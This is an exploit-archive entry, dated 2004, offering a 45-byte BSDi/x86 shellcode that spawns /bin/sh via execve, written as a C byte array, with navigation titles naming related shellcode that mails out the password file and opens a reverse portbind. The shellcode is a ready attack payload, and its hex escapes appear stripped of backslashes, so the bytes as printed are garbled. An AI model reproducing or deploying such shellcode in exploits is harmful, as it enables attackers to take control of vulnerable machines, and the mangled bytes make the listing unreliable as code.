[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : bsdi/x86 execve /bin/sh 45 bytes
# Published : 2004-09-26
# Author : duke
# Previous Title : bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes
# Next Title : bsd/x86 reverse portbind 129 bytes


/*
 *  BSDi
 *  execve() of /bin/sh by duke (duke@viper.net.au)
 */

char bsdi_shell[]=
  "xebx1fx5ex31xc0x89x46xf5x88x46xfax89x46x0cx89x76"
  "x08x50x8dx5ex08x53x56x56xb0x3bx9axffxffxffxffx07"
  "xffxe8xdcxffxffxff/bin/shx00";

# www.Syue.com [2004-09-26]